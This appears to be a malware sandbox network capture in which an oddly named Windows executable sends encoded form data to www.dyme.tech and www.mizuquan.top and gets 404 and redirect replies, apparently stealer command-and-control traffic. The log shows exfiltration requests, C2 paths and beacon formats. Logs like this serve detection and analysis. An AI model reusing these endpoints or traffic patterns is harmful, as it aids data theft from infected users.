                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZI1sD0R+CpMqRnLAOc5+OSr1AYXQhNhGLY=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:45.111304998 CEST | 10903 | OUT | POST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 4d 71 4c 72 75 73 71 6f 5a 66 71 50 6b 74 37 69 51 6e 2f 53 70 31 79 44 66 6c 4f 73 4d 4f 73 64 53 66 39 48 6c 61 4e 78 6c 59 52 50 48 51 68 77 70 76 6b 77 54 59 38 42 71 35 55 69 69 45 74 33 63 78 46 4c 36 2b 77 68 64 4c 4e 58 33 7a 36 57 74 74 4e 58 37 6c 30 44 59 59 6e 34 51 57 65 75 33 7a 62 58 68 68 61 66 55 31 7a 4f 45 74 6d 4e 49 4a 6d 6b 45 30 35 39 6a 78 61 46 36 6d 6e 4d 7a 6c 47 77 70 68 44 71 77 52 54 70 30 2b 4c 6d 6b 41 77 6f 51 46 53 6f 56 6a 37 48 59 49 67 61 6d [TRUNCATED]
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/MqLrusqoZfqPkt7iQn/Sp1yDflOsMOsdSf9HlaNxlYRPHQhwpvkwTY8Bq5UiiEt3cxFL6+whdLNX3z6WttNX7l0DYYn4QWeu3zbXhhafU1zOEtmNIJmkE059jxaF6mnMzlGwphDqwRTp0+LmkAwoQFSoVj7HYIgamK9u2CKb5tcht6HltlpZeE79orTF5jipAbs3Iz1TULeC8/zak1bqwjO+7/thciCJx2o96RXw/fcTjl2+hgPGOjt0YPizGo1syqD8EhEL2KWQUZ5eytAR72dJ/hqaQOEcw2NHQmDhCSYbmU+MufFhVrmm5Ni3syWC7Y1xnpsVqNxVYpCDFffc9b4zPSZXBaN9VsmG/SCnLEyravEzbv9z50YzTL+C2b+uJVZYrg07UzBT2FBSHVRkcnThoxPNpR+VhHVRvsIbXMRVEWvKrCqdMD+Hq0UgToNxxaVUFiUMRC+uQBCbdvgUdOLthFW5s/w5oWLzHFEYRs8O6Phx3qmU86Jp5ai2MbQt+ZPwSmhwmjj5nYSzyvhdlSkxZ9yZ3XOszw7jEndhAvvSFxDSj1nkpADLAa5yyXfS9sRbSJIeshtGbLr4wROGZ4Bm8K9cdWmxTjShDiNCQv68IRs8ybT7dW6aPCPeEvi8DoyNTVj/wju93DoDHpIXFfXSP6ZosxPYUgEK94W9NfNhY5L03ElYuBenrheu+kKK/OxhP+oHGgUzDGY1bIBjJBQwX8GuBj4OAS3yfdtxKpqtdF+GlTUsb43qk/nFBr/cdupjDdXmPxUpCcKorUUi2OWm+9yru/pGHXwXupWhx9EjVqCK5tiM6/7eyYIb140pm8v [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:47.655144930 CEST | 539 | OUT | GET /h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:48.123720884 CEST | 391 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 26 Sep 2024 07:25:48 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 251
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 30 71 74 33 46 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 46 45 2b 6b 53 34 31 33 35 73 48 4b 32 51 57 4b 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 56 2b 77 32 67 50 50 31 69 39 67 53 36 44 51 58 2f 36 4b 68 7a 38 45 42 61 37 34 50 2b 46 4f 6c 36 61 45 3d 26 6b 5a 3d 45 38 57 70 49 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI"}</script></head></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.4 | 49770 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:07.303767920 CEST | 810 | OUT | POST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 4e 5a 4d 4a 49 66 4e 43 45 31 42 6b 38 53 53 67 51 55 78 59 59 77 43 59 42 42 44 2b 71 55 48 64 77 3d 3d
                                                    Data Ascii: y0qt3F=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPNZMJIfNCE1Bk8SSgQUxYYwCYBBD+qUHdw==
                                                    Sep 26, 2024 09:26:08.214174032 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:08 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.4 | 49771 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:09.845237017 CEST | 830 | OUT | POST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 55 78 46 47 49 33 7a 70 70 4f 47 39 39 34 38 72 70 77 55 33 76 64 34 65 37 56 77 37 66 38 48 6b 67 3d
                                                    Data Ascii: y0qt3F=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYUxFGI3zppOG9948rpwU3vd4e7Vw7f8Hkg=
                                                    Sep 26, 2024 09:26:10.737025023 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.4 | 49772 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:12.392280102 CEST | 10912 | OUT | POST /e0nr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Origin: http://www.mizuquan.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.mizuquan.top/e0nr/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 64 51 73 72 32 74 69 78 70 61 52 6f 51 6a 65 6e 55 33 30 36 6c 76 4e 2f 4e 6d 7a 62 4a 63 41 32 72 57 30 4e 6e 46 74 70 6e 4d 52 51 65 51 2b 73 31 74 46 6b 78 58 64 4f 66 57 74 71 78 5a 66 75 70 57 30 42 64 67 42 64 56 6b 56 67 62 38 54 30 56 4e 30 43 41 52 50 45 61 32 65 57 44 73 55 36 32 44 67 70 4a 35 37 6c 54 34 59 73 52 71 76 51 62 42 55 2f 4b 57 46 69 38 46 35 41 2f 32 46 52 66 50 65 49 71 62 69 65 47 41 66 2f 6a 75 42 35 2b 41 44 54 48 45 6b 79 45 59 6c 51 39 76 65 57 66 [TRUNCATED]
                                                    Data Ascii: y0qt3F= [TRUNCATED]
                                                    Sep 26, 2024 09:26:13.288069010 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:13 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:14.937247992 CEST | 542 | OUT | GET /e0nr/?y0qt3F=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.mizuquan.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:26:16.665250063 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                    Sep 26, 2024 09:26:16.665829897 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                    Sep 26, 2024 09:26:16.666527033 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 26 Sep 2024 07:26:15 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
